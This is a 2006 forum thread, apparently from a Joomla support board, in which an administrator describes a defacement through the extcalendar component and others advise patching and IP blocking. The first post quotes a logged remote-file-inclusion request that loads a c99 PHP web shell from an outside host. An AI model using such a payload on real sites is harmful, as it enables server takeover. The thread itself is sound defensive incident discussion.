|
|
#1 |
![]() Join Date: Mar 2006
Posts: 36
![]() |
Hey guys, should this be a warning?? -->HacKeD By TamTurk<--
we got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes,...everything is pretty fcuked. We fixed it but they left yet another little PHPshell (c99shell) hidden deep down,...and thew whole thing started again. Particularly emberassing for our clients as the site got defaced pretty badly with some Islam/Terror stuff,.... We went trough all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed trough: .../components/com_extcalendar/admin_events.php The whole command looked like this: Code:
.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F&act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a" We checked out other potential vulnerable scripts as the upload facilities of Docman and ZOOm,...but they are both upload facilities disbaled in the fron-end,..and the files seem secure,... Any opinions nsLast edited by dkone : August 9th, 2006 at 09:21. |
|
|
|
|
|
#2 | |
![]() Join Date: Jul 2005
Posts: 76
![]() |
Quote:
Plus you got it right with the defined( '_VALID_MOS' ) missing code issue. That alone will help a lot. See my other post on my response to being hacked. So far, 100% success and the attempts are dwindling. The bastards host their scripts on web sites as well, so be sure to block those sites ip's and, if possible, entire CIDR blocks of the hacker's source IP. See my other post on that. |
|
|
|
|
|
|
#3 |
![]() Join Date: Mar 2006
Posts: 36
![]() |
Cool, thanks man...
I think we got it resolved,...there a fix out,..since about 2 weeks,..from a joomla team, replacing all the vulnerable files in extcal. http://forum.joomla.org/index.php?topic=75390.msg389913 Yes, these guys keep hammering the doors,..but sofar everything keeps up. Tmorrow I will look at your other posts,..and start blocking IPranges,... Cya dk |
|
|
|
![]() |
| Thread Tools | Search this Thread |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| website hacked | joe tan | Administration Questions | 5 | February 23rd, 2006 22:17 |
| My site was hacked | TheGreekinChina | Security & Performance | 4 | January 23rd, 2006 16:47 |
| Webinsta / Limbo demo... hacked? | TheWraith | General Questions | 2 | April 21st, 2005 09:50 |
| Sco site hacked! | boppinbob | General Discussion | 0 | November 30th, 2004 10:00 |